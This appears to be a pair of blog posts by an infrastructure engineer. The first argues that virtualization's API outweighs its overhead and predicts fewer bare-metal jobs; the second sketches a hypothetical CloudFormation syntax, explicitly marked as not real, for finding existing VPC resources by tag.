Let me clarify here: virtualization at the macro level does eat cycles, affecting everything from memory usage to network IO.  We're all well aware of this; we call it a cost, something you pay in order to get something else.  And the cost buys us something that most of the bare metal people forget about: an API.

I can create 50 nodes that do something neat with a single command.  You require six months of debate, committees, and purchase-order red tape to get new hardware.  Once the hardware arrives you also eat the cost of racking everything and tracking the assets in whatever horrible abomination tracks those bits; then, finally ( in most cases ), there is a semi-automated process to get the instance up.

After everything is said and done you've spent an enormous amount of time, energy, and money on something you could have done in five minutes for much cheaper.

Adding capacity to a site is an example of such a use case.

I've always believed that the capacity of a single piece of hardware will never compare to what can be done with many smaller things.  If you need an actual use case for how this works, take a look at how Amazon does ELB: many virtualized haproxy nodes, not one giant piece of hardware.  Heat ( part of OpenStack ) has a similar type of functionality that looks like ELB and just spins up haproxy nodes.

Summary

I predict that we're going to start seeing an imbalance of sorts when it comes to IT jobs.  The bare metal folks will gravitate towards the few remaining companies that either specialize in a tailored "private cloud" experience ( like Blue Box Group or RackSpace ) or can justify running their own datacenters ( Facebook or Twitter being the obvious examples ).

In either case the pool of available jobs will decrease and employers will require more and more specialization in new hires.  The sector will become a niche offering and eventually suffer from a dire lack of available, qualified people.

While this is happening, the cloud people will continue to accelerate on the cloud platforms and eventually reach the critical mass at which point we will have fully transitioned our expectations from "old and broken ESPN" to "rich and engaging ESPN."  At which point I will eat cake.




CloudFormation and VPCs

CloudFormation with VPCs and VPNs.

We run hardware VPN connections from our datacenter to our end points in the cloud.
VPCs are used on the cloud side because VPCs are awesome.

Everything is connected together such that we have a single VPC and multiple subnets that can all route over the VPN back to the bare metal resources.

I use tags on the VPC, Subnet, and NetworkACL objects to determine which resource to connect to.

What would be nice is a way to reference an existing resource by a search query object.

For example:

{
  "Resources": {
    "ExistingVPC": {
      "Type": "AWS::EC2::VPC",
      "Search": {
        "Dimension": { "Tag": "primary" }
      }
    }
  }
}

I'm leaving quite a bit out here, but the basic idea is to have a search query that finds an existing object.  Additionally, you could include the "Properties" hash as a series of overrides.
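
Extending that idea, the same hypothetical syntax could accept the "Properties" hash inline as overrides on the found resource ( again, a pure sketch; none of this exists in CloudFormation ):

{
  "Resources": {
    "ExistingVPC": {
      "Type": "AWS::EC2::VPC",
      "Search": {
        "Dimension": { "Tag": "primary" }
      },
      "Properties": {
        "EnableDnsSupport": "true"
      }
    }
  }
}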